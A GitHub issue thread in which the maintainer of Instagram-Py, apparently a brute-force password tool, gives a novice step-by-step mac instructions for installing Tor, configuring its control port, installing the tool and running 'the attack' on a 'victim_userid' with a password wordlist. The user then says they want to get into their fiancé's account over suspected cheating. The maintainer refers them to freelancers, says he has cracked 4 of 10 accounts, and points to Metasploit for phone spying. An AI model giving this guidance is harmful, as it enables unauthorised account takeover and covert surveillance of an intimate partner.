### ISSUE TITLE
how to run instagram-py on mac ?

### ISSUE THREAD

**Issue by justanoob1** [antony-jr/ama#6]
Hi,

I am using a mac to try to use the Instagram program u created, however I am not sure what I am doing. I'm a noob to this stuff. Can you help me please?

**Comment by antony-jr** [comment]
Hey @justanoob1 

Its possible to run **Instagram-Py** on mac but its bit **tricky**.
Please see that I do not own a mac and so I cannot test the script on mac but I think
it can work because MacOSX is unix under the hood.

# Install Tor for MacOSX
You need to install **homebrew** , you can always google on 'how to install homebrew'.
**After installing homebrew** , execute this command in your terminal.

For more information , Head to https://brew.sh

```
 $ brew install tor
```

**YOU JUST HAVE TO INSTALL TOR ONCE**.

# Configuring Tor
Open your tor configuration usually located at **/usr/local/etc/tor/torrc** with a text editor.
search for the file for this specific section

```
## The port on which Tor will listen for local connections from Tor
## controller applications, as documented in control-spec.txt.
#ControlPort 9051
```
**uncomment** 'ControlPort' by deleting the **#** before 'ControlPort'.
**it should look like this after you make the changes...**

```
## The port on which Tor will listen for local connections from Tor
## controller applications, as documented in control-spec.txt.
ControlPort 9051
```

make sure to save the file.

**JUST HAVE TO DO THIS ONCE**.

# Running Tor on your MacOSX 
Open a **new** terminal and execute this command and **do not close the terminal**.
```
 $ tor
```

**CLOSE THE TERMINAL TO STOP THE TOR SERVER , START TOR FROM A NEW
TERMINAL TO START TOR AGAIN , INCASE YOU DO THE ATTACK AGAIN.**

**DO NOT RUN TWO TOR PROCESS**.


# Installing Instagram-Py
**IMPORTANT** : Install the latest python version ( >= v3.6 ) and pip version ( >= 9.0.0 )
for more information refer https://python.org , You can also google your way out.

**After installing Python and Pip** , Execute these commands in a **new terminal**.

```
$ sudo pip3 install requests --upgrade
$ sudo pip3 install requests[socks]
$ sudo pip3 install stem
$ sudo pip3 install instagram-py
$ instagram-py # installed successfully
$ instagram-py --create-configuration --default-configuration # this is important
```

**YOU JUST HAVE TO INSTALL INSTAGRAM-PY ONCE**.


# Do the Attack

After this open a **new terminal** and execute this command to start your attack.

```
 $ instagram-py -u victim_userid -pl /path/to/wordlist.txt 
```

**Instagram-Py** usage...

**Note:** Without the -c optional argument , instagram-py will not continue the attack

```
usage: instagram-py [-h] [--username USERNAME] [--password-list PASSWORD_LIST]
                    [--script SCRIPT] [--inspect-username INSPECT_USERNAME]
                    [--create-configuration] [--default-configuration]
                    [--countinue] [--verbose]

optional arguments:
  -h, --help            show this help message and exit
  --username USERNAME, -u USERNAME
                        username for Instagram account
  --password-list PASSWORD_LIST, -pl PASSWORD_LIST
                        password list file to try with the given username.
  --script SCRIPT, -s SCRIPT
                        Instagram-Py Attack Script.
  --inspect-username INSPECT_USERNAME, -i INSPECT_USERNAME
                        Username to inspect in the instagram-py dump.
  --create-configuration, -cc
                        Create a Configuration file for Instagram-Py with
                        ease.
  --default-configuration, -dc
                        noconfirm for Instagram-Py Configuration Creator!
  --countinue, -c       Countinue the previous attack if found.
  --verbose, -v         Activate Verbose mode. ( Verbose level )

example: instagram-py -c -vvv -u instatestgod__ -pl rockyou.txt

Report bug, suggestions and new features at https://github.com/antony-jr/instagram-py
```

For more information head to https://github.com/antony-jr/instagram-py

**Comment by justanoob1** [comment]
... excuse my ignorance.

What is a terminal? What do I do with those codes? Do I paste them into one page?

**Comment by antony-jr** [comment]
Hmm... Thats really the basics in doing hacking stuff with mac , I think you need to google everything , **these codes** has to be typed in the terminal **without** the **'$'** symbol , The **'$'** symbol represents a terminal command... 

**Terminal is a program in mac**.

**Comment by justanoob1** [comment]
Awesome, I am definitely googling as I read, however one last question. I'm assuming the terminal is the page where the codes exists, however when opening your files I see multiple with different codes. Do I keep everything in one page? Which is the main file I should focus on in Instagram-Py?

**Comment by antony-jr** [comment]
@justanoob1 What page are you talking about , **Terminal is a program which executes commands line by line as you enter** , type a command and just press enter.
**YOU DON'T NEED TO DOWNLOAD INSTAGRAM-PY ANYWHERE JUST EXECUTE THE COMMAND THAT I GAVE IN THE 'INSTALLING INSTAGRAM-PY' SECTION ABOVE**.

**Comment by antony-jr** [comment]
@justanoob1 take a look here https://www.youtube.com/watch?v=ftJoIN_OADc , to get a idea on what is a **Terminal**.

**Comment by justanoob1** [comment]
Thank you, I am watching the video now as we speak.

**Comment by justanoob1** [comment]
Will I be able to give you the Instagram I am trying to access? I believe my fiance is cheating on me and I want to find out.

**Comment by antony-jr** [comment]
@justanoob1 sorry but I suppose that service is kind of illegal if I do it... So you have to do it.. You can ask a freelancer to do it.. ( I think ? )

**Comment by justanoob1** [comment]
can I rephrase the question? I am in dire need of help and currently seeking a freelancer. Can you recommend one?

**Comment by antony-jr** [comment]
@justanoob1 Please see that brute force only has a **50 Percentage probability!** , you can get a freelancer here https://freelancer.com/

**Comment by justanoob1** [comment]
have u had any luck with the brute force?

**Comment by antony-jr** [comment]
4 / 10 Accounts I guess , **Brute Force** is just a method and there are millions of methods , like a metasploit exploit where you just need to install a app to spy everything on ones phone , its really awesome than brute force...

**Comment by justanoob1** [comment]
Where can I find this metasploit?

**Comment by antony-jr** [comment]
here https://www.metasploit.com/ but its a tool just like instagram-py but it has guides on mac too...

**Comment by justanoob1** [comment]
thank u!

**Comment by justanoob1** [comment]
Im almost done with the brute force, where do I upload the information for it to start working?

**Comment by antony-jr** [comment]
>  where do I upload the information for it to start working?

I dont get you , what information ?

**Comment by antony-jr** [comment]
Okay @justanoob1 I think I need to go... I hope everything works with you , I'm in a hurry.... See ya! later..
